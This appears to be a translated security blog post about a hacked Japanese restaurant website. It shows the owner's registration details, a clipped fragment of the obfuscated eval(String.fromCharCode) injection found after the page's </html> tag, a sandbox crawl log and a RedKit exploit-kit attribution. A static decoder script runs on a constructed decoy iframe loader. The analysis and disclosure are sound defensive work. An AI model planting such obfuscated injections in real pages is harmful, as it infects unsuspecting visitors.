hxxp://enokizaka.jp/
hxxp://www.enokizaka.jp/
hxxp://enokizaka.jp/index.html
hxxp://www.enokizaka.jp/index.html
↑ Please remove the infection code as soon as possible. I also think you should change the FTP account credentials.
Contact details ↓
[Registrant] えのき坂 [Registered] 2009/04/01 [Expires] 2013/04/30 [Status] Active [Last updated] 2012/05/01 01:05:01 (JST)
[Name] 有限会社たけかわ企画 [Name] Takekawa Kikaku Inc [Email] info@takenet.or.jp
[Postal code] 508-0041 [Address] 岐阜県中津川市本町2-4-22 [Postal Address] 2-4-22,Honmachi,Nakatsugawa,Gifu,JP [Phone] 0573-62-0050

There is malicious JS code at line 113 of index.html; it looks like this ↓
</html><script>/*km0ae9gr6m*/window.eval(String.fromChar ,59,105,102,40,33,39,39,46,114,101,112,108,97,99,101,40, 4,101,112,108,97,99,101,40,110,101,119,32,82,101,103,69, 4,67,44,49,99,44,97,44,107,44,72,44,75,44,49,107,44,112, 51,44,48,44,49,55,44,111,44,100,44,48,44,57,44,52,44,104 4,48,44,57,44,52,44,104,44,55,44,71,44,112,44,51,44,48,4 ,44,121,44,97,44,52,44,73,44,48,44,49,56,44,48,44,57,44, 4,77,44,51,44,103,44,97,44,49,65,44,51,44,50,112,44,69,4 ,44,97,44,65,44,51,44,77,44,51,44,50,101,44,49,82,44,50, ,49,102,44,75,44,49,104,44,48,44,72,44,49,52,44,69,44,55

(The listing above is clipped at the right edge; the eval() wraps a String.fromCharCode() call whose numeric arguments are the character codes of the next layer.) Once decoded, the malware infection code is plainly visible ↓
In the browser simulator you cannot tell that an infection was found ↓, but...

19:58:46 [hxxp] URL: hxxp://enokizaka.jp/ (Status: 200, Referrer: None)
19:58:46 [hxxp] URL: hxxp://enokizaka.jp/ (Content-type: text/html, MD5: 000bcb872c056f3702e80cab6dbbfeb6)
19:58:49 <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="850"> <param name="movie" value="image/enokisaka.swf"></param> <param name="quality" value="high"></param><param name="LOOP" value="false"></param> <embed height="300" loop="false" pluginspage="hxxp://www.macromedia.com/go/getflashplayer" quality="high" src="image/enokisaka.swf" type="application/x-shockwave-flash" width="850"></embed> </object>
19:58:49 [Shellcode Analysis] URL Detected: hxxp://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,19,0
19:58:49 [hxxp] URL: hxxp://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab (Status: 200, Referrer: hxxp://enokizaka.jp/)
19:58:49 [hxxp Redirection (Status: 302)] Content-Location: hxxp://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,19,0 --> Location: hxxp://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
19:58:49 [hxxp] URL: hxxp://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab (Content-type: text/plain; charset=UTF-8, MD5: 669ce904c62ec9f546561f8ad5dcd5b9)
Exception UnicodeEncodeError: UnicodeEncodeError('ascii', u'\u3048\u306e\u304d\u5742', 0, 4, 'ordinal not in range(128)') in 'pylibemu.Emulator.run' ignored
19:58:49 <meta content="text/html; charset=utf-8" hxxp-equiv="Content-Type"/>
19:58:49 <meta content="text/css" hxxp-equiv="Content-Style-Type"/>
19:58:49 <meta content="蕎麦,妻籠,妻篭,食事,木曽,木曽路,和菓子,おみやげ,中山道,中仙道" name="keywords"/><meta content="えのき坂
19:58:49 <link href="base.css" rel="stylesheet" type="text/css"/>
19:58:49 [Navigator URL Translation] base.css --> hxxp://enokizaka.jp/base.css
19:58:50 [hxxp] URL: hxxp://enokizaka.jp/base.css (Status: 200, Referrer: hxxp://enokizaka.jp/)
19:58:50 [hxxp] URL: hxxp://enokizaka.jp/base.css (Content-type: text/css, MD5: 84f283775989f3b46ffa9173e5cae8e3)
19:59:08 <param name="movie" value="image/enokisaka.swf"></param>
19:59:08 [Navigator URL Translation] image/enokisaka.swf --> hxxp://enokizaka.jp/image/enokisaka.swf
19:59:11 [hxxp] URL: hxxp://enokizaka.jp/image/enokisaka.swf (Status: 200, Referrer: hxxp://enokizaka.jp/)
19:59:11 [hxxp] URL: hxxp://enokizaka.jp/image/enokisaka.swf (Content-type: application/x-shockwave-flash, MD5: 8e8208b561fbf74c95046deee6844269)
19:59:24 <param name="quality" value="high"></param>
19:59:24 <param name="LOOP" value="false"></param>
19:59:24 <embed height="300" loop="false" pluginspage="hxxp://www.macromedia.com/go/getflashplayer" quality="high" src="image/enokisaka.swf" type="application/x-shockwave-flash" width="850"></embed>
19:59:24 [Navigator URL Translation] image/enokisaka.swf --> hxxp://enokizaka.jp/image/enokisaka.swf
19:59:26 [hxxp] URL: hxxp://enokizaka.jp/image/enokisaka.swf (Status: 200, Referrer: hxxp://enokizaka.jp/)
19:59:26 [hxxp] URL: hxxp://enokizaka.jp/image/enokisaka.swf (Content-type: application/x-shockwave-flash, MD5: 8e8208b561fbf74c95046deee6844269)
19:59:43 [Shellcode Analysis] URL Detected: hxxp://www.google-analytics.com/ga.js
19:59:43 [hxxp] URL: hxxp://www.google-analytics.com/ga.js (Status: 200, Referrer: hxxp://enokizaka.jp/)
19:59:43 [hxxp] URL: hxxp://www.google-analytics.com/ga.js (Content-type: text/javascript, MD5: 8cfe61bbf8631fe69a99b68d8313e8ac)
19:59:44 [Window] Eval argument length > 64 (4997)
19:59:44 [AST]: Eval argument length > 64

The only hint the simulator gives is the last pair of lines: an eval() argument of 4997 characters, which is far too long for legitimate page code. In fact, the obfuscated code in this case was built to be very complex.
It was a pseudo-random-domain infection scheme (via the RedKit Exploit Kit).
How complex? ↓
random domain → JS/obfs1 → JS/obfs2 → JS/packer → JS/obfs3 once more = this infection code.
Since I did the cracking through my overseas channel, I wrote up the decoding method on my English malware blog; please see it at this URL → http://malwaremustdie.blogspot.jp/2012/10/decoding-multilayer-javascript-packed.html
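As an added illustration (this is not the original post's code, nor the decoder from the linked English write-up), the JavaScript below peels eval(String.fromCharCode(...)) wrappers statically, without executing anything, and lists the <script> blocks that sit after the closing </html> tag, which is where this injection was appended. The sample page, the /*km0ae9gr6m*/ marker comment placed in it and the decoy payload are constructed for the demo; the real injected code from the site is not reproduced.

```javascript
// Added example, not the original post's code. Statically peels
// eval(String.fromCharCode(n,n,...)) layers and flags <script> blocks that
// follow </html>. The sample page at the bottom is constructed for the demo.

const FROMCHARCODE_RE =
  /(?:window\s*\.\s*)?eval\s*\(\s*String\s*\.\s*fromCharCode\s*\(\s*((?:\d{1,5}\s*,\s*)*\d{1,5})\s*\)\s*\)\s*;?/;

// Decode one eval(String.fromCharCode(...)) wrapper without running eval.
// Returns null when the source contains no such wrapper.
function peelOneLayer(src) {
  const m = FROMCHARCODE_RE.exec(src);
  if (!m) return null;
  const codes = m[1].split(',').map((n) => parseInt(n.trim(), 10));
  if (codes.some((c) => Number.isNaN(c) || c > 0xffff)) return null;
  return String.fromCharCode(...codes);
}

// Peel repeatedly until no wrapper remains; every intermediate layer is kept
// so each obfuscation stage can be inspected. maxDepth guards against loops.
function peelLayers(src, maxDepth = 16) {
  const layers = [src];
  for (let i = 0; i < maxDepth; i++) {
    const next = peelOneLayer(layers[layers.length - 1]);
    if (next === null) break;
    layers.push(next);
  }
  return layers;
}

// Return the bodies of <script> elements that appear after </html>.
// A well-formed page has no code there; appended injections often do.
function scriptsAfterHtmlClose(html) {
  const idx = html.search(/<\/html\s*>/i);
  if (idx < 0) return [];
  const tail = html.slice(idx);
  const re = /<script\b[^>]*>([\s\S]*?)<\/script\s*>/gi;
  const out = [];
  let m;
  while ((m = re.exec(tail)) !== null) out.push(m[1]);
  return out;
}

// Run both checks over a page: one list of peeled layers per suspicious script.
function analyse(html) {
  return scriptsAfterHtmlClose(html).map((s) => peelLayers(s));
}

// --- Constructed sample (hypothetical, not the real infection code) ---
// wrapLayer() is a toy packer that produces the same shape as the page's
// window.eval(String.fromCharCode(...)) fragment.
function wrapLayer(code) {
  const nums = Array.from(code, (ch) => ch.charCodeAt(0)).join(',');
  return `window.eval(String.fromCharCode(${nums}));`;
}
const INNER =
  "var u='http://example.invalid/';document.write('<iframe src=\"'+u+'\"></iframe>');";
const SAMPLE_PAGE =
  '<html><body>hello</body></html>' +
  '<script>/*km0ae9gr6m*/' + wrapLayer(wrapLayer(INNER)) + '</script>';

if (typeof require !== 'undefined' && require.main === module) {
  for (const layers of analyse(SAMPLE_PAGE)) {
    layers.forEach((l, i) => console.log(`layer ${i}:`, l.slice(0, 80)));
  }
}
```

The decoder never calls eval, so it is safe to run on a live sample; what it cannot do is unpack stages that use a different trick (the post names a JS/packer stage), which is why peelLayers returns every intermediate layer instead of only the last one: the analyst continues from whichever stage the regex no longer matches.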